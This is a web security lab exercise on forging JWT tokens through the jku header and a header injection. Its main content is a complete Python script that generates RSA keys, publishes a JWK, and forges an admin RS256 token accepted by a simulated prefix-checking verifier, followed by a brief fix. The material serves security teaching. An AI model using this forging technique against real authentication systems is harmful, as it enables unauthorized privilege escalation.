JWT XI
This exercise covers how to use the jku header to bypass an authentication based on JWT.
This exercise delves into the exploitation of the jku header within JWT tokens, specifically aimed at forging a token to gain admin privileges. Building on previous exercises (JWT VIII and IX), you'll learn how to create a private and public key pair, craft a JWK file, and use a header injection vulnerability to serve this JWK file from a trusted URL. The key challenge is the application's URL restriction: it only accepts jku values that start with its own trusted origin. The header injection vulnerability lets you serve attacker-controlled content from a URL on that origin, so the restriction is satisfied while the key material is still yours.
You'll start by generating RSA keys and writing scripts to extract the necessary public-key parameters (n and e), serve the JWK file via the header injection, and sign the JWT payload. Despite the application's caching and URL restrictions, you'll learn to modify the URL so that a fresh copy of the JWK file is fetched, and to make sure the algorithm in the header matches the key type (RS256). By the end of the exercise, you will have forged a JWT token and bypassed the signature check, demonstrating that a correctly signed token is still worthless when the verifier lets the token choose where its verification key comes from.
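The whole chain described above, written out as an added example that is not the exercise's own solution code: generate an RSA key pair, publish the public part as a JWK with the n and e parameters, forge an RS256 token whose header points jku at that JWK, and then run it through a simulated verifier that applies the kind of prefix-only jku check the exercise targets. Everything here is an assumption for illustration: the trusted origin, the path on that origin (the exercise uses a header injection to make a trusted URL return the attacker's JWK; here that is simulated by a lookup table mapping the URL to the served document), and the RSA/PKCS#1 v1.5 arithmetic, which is implemented in pure Python so the script runs with no third-party packages (the key is generated at run time at a demo size and is not suitable for real use; use cryptography or PyJWT for anything real).

```python
import base64
import hashlib
import json
import secrets

# Assumed trusted origin the verifier accepts jku values from (hypothetical).
TRUSTED_PREFIX = "https://app.example/"
# DER DigestInfo prefix for SHA-256, as required by PKCS#1 v1.5 (RFC 8017, 9.2).
SHA256_DIGESTINFO = bytes.fromhex("3031300d060960864801650304020105000420")


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def is_probable_prime(n: int, rounds: int = 32) -> bool:
    """Miller-Rabin primality test (demo key generation only)."""
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37):
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):
        x = pow(secrets.randbelow(n - 3) + 2, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def gen_prime(bits: int) -> int:
    while True:
        candidate = secrets.randbits(bits) | (1 << (bits - 1)) | 1
        if is_probable_prime(candidate):
            return candidate


def gen_rsa(bits: int = 1024):
    """Return (n, e, d). 1024 bits keeps the pure-Python demo fast; too small for real use."""
    e = 65537
    while True:
        p, q = gen_prime(bits // 2), gen_prime(bits // 2)
        n, phi = p * q, (p - 1) * (q - 1)
        if p != q and phi % e != 0 and n.bit_length() == bits:
            return n, e, pow(e, -1, phi)


def emsa_pkcs1_v15(msg: bytes, k: int) -> int:
    """EMSA-PKCS1-v1_5 encoding of SHA-256(msg) as an integer, k = modulus length in bytes."""
    t = SHA256_DIGESTINFO + hashlib.sha256(msg).digest()
    return int.from_bytes(b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t, "big")


def rs256_sign(msg: bytes, n: int, d: int) -> bytes:
    k = (n.bit_length() + 7) // 8
    return pow(emsa_pkcs1_v15(msg, k), d, n).to_bytes(k, "big")


def rs256_verify(msg: bytes, sig: bytes, n: int, e: int) -> bool:
    k = (n.bit_length() + 7) // 8
    return len(sig) == k and pow(int.from_bytes(sig, "big"), e, n) == emsa_pkcs1_v15(msg, k)


def int_to_b64url(x: int) -> str:
    return b64url(x.to_bytes((x.bit_length() + 7) // 8, "big"))


def make_jwks(n: int, e: int, kid: str) -> dict:
    """The JWK file the attacker serves: only the public parameters n and e go in."""
    return {"keys": [{"kty": "RSA", "alg": "RS256", "use": "sig", "kid": kid,
                      "n": int_to_b64url(n), "e": int_to_b64url(e)}]}


def forge_token(payload: dict, jku: str, kid: str, n: int, d: int) -> str:
    """Attacker side: sign an arbitrary payload with our own key, pointing jku at our JWK."""
    header = {"alg": "RS256", "typ": "JWT", "kid": kid, "jku": jku}
    compact = lambda obj: b64url(json.dumps(obj, separators=(",", ":")).encode())
    signing_input = compact(header) + "." + compact(payload)
    return signing_input + "." + b64url(rs256_sign(signing_input.encode(), n, d))


def verify_token(token: str, fetch) -> dict:
    """Simulated vulnerable verifier: only checks that jku *starts with* the trusted origin,
    then trusts whatever key document that URL returns. `fetch(url)` stands in for the HTTP GET."""
    h_b64, p_b64, s_b64 = token.split(".")
    header = json.loads(b64url_decode(h_b64))
    if header.get("alg") != "RS256":
        raise ValueError("unsupported alg")
    jku = header.get("jku", "")
    if not jku.startswith(TRUSTED_PREFIX):          # the URL restriction the exercise bypasses
        raise ValueError("jku not on trusted origin")
    key = next(k for k in fetch(jku)["keys"] if k.get("kid") == header.get("kid"))
    n = int.from_bytes(b64url_decode(key["n"]), "big")
    e = int.from_bytes(b64url_decode(key["e"]), "big")
    if not rs256_verify(f"{h_b64}.{p_b64}".encode(), b64url_decode(s_b64), n, e):
        raise ValueError("bad signature")
    return json.loads(b64url_decode(p_b64))


def demo() -> dict:
    n, e, d = gen_rsa()
    kid = "attacker-key"
    # Hypothetical trusted URL whose response body the attacker controls via the header injection.
    jku = TRUSTED_PREFIX + "injected/jwks.json"
    served = {jku: make_jwks(n, e, kid)}           # what the verifier "fetches" from that URL
    token = forge_token({"user": "admin"}, jku, kid, n, d)
    return verify_token(token, served.__getitem__)


if __name__ == "__main__":
    print(demo())                                   # {'user': 'admin'}
```

The fix on the verifier side is to never let the token pick its key source: pin the JWKS URL in server configuration (or an exact allowlist of full URLs, not a prefix), ignore or reject jku in the header, and bind kid lookups to that pinned document.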